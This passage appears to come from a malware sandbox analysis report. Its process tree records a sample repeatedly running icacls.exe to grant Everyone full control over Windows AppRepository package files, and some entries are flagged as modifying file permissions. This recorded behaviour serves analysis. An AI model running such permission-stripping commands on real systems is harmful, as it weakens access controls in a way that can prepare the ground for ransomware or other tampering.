  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\EnvironmentsApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11676
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloCamera_1.0.0.5_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8504
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloItemPlayerApp_1.0.0.2_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15116
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\HoloShell_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10888
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-140_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13608
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13236
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16612
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16560
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AAD.BrokerPlugin_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16596
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.AccountsControl_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10500
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8420
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Advertising.Xaml_10.0.1605.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10588
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:10968
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13272
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:10956
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15956
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BioEnrollment_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12140
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.BioEnrollment_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16528
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.CredDialogHost_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8528
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8536
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13708
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10628
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.1.25002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8520
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.DesktopAppInstaller_1.1.25002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10516
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10872
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9912
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.LockApp_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:16364
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.2.24002.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3908
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9952
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15864
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6004
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15352
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftEdge_40.15063.0.0_neutral__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14352
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:2980
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftOfficeHub_2017.311.255.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6032
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11580
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16284
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12308
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:5380
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10428
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:9972
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:12352
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15456
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MicrosoftStickyNotes_1.4.101.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1700
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:8796
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:14236
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15464
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10000
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1780
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1540
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:7372
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.NET.Native.Runtime.1.4_1.4.24201.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11688
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Office.OneNote_2015.7668.58071.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5100
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:8716
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16812
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6596
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11720
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16820
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:16844
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:10132
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.People_2017.222.1920.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1520
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.PPIProjection_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5128
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_split.scale-125_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:2436
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_~_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1240
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_neutral_~_kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3176
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5392
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.45.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1976
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.StorePurchaseApp_1.0.454.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3836
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:2324
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.VCLibs.140.00_14.0.24123.0_x86__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:3832
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1232
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:504
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Apprep.ChxApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.AssignedAccessLockApp_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:204
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.CloudExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:1324
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ContentDeliveryManager_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4320
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Cortana_1.8.12.15063_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4108
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.HolographicFirstRun_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4216
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ModalSharePickerHost_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:17068
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkCaptivePortal_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4936
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.OOBENetworkConnectionFlow_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4548
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ParentalControls_1000.15063.0.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:15304
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4400
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.Photos_2016.511.9510.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4372
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecHealthUI_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4820
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecondaryTileExperience_10.0.0.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6212
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.SecureAssessmentBrowser_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4396
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.ShellExperienceHost_10.0.15063.0_neutral_neutral_cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4616
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Windows.WindowPicker_10.0.15063.0_neutral__cw5n1h2txyewy.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4128
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6524
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5736
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsAlarms_2017.203.236.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15288
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11344
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:15592
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:6440
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4812
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4916
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4280
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:15332
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\microsoft.windowscommunicationsapps_2015.7906.42257.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4624
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4604
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:4712
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:5408
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:4376
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:12256
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:13656
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:6164
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-125_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11256
- C:\Windows\SYSTEM32\icacls.exe
  "icacls.exe" C:\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.WindowsSoundRecorder_10.1702.301.0_neutral_split.scale-200_8wekyb3d8bbwe.xml /grant Everyone:F /T /C /Q
  2⤵
  PID:11252
- C:\Windows\SYSTEM32\icacls.exe
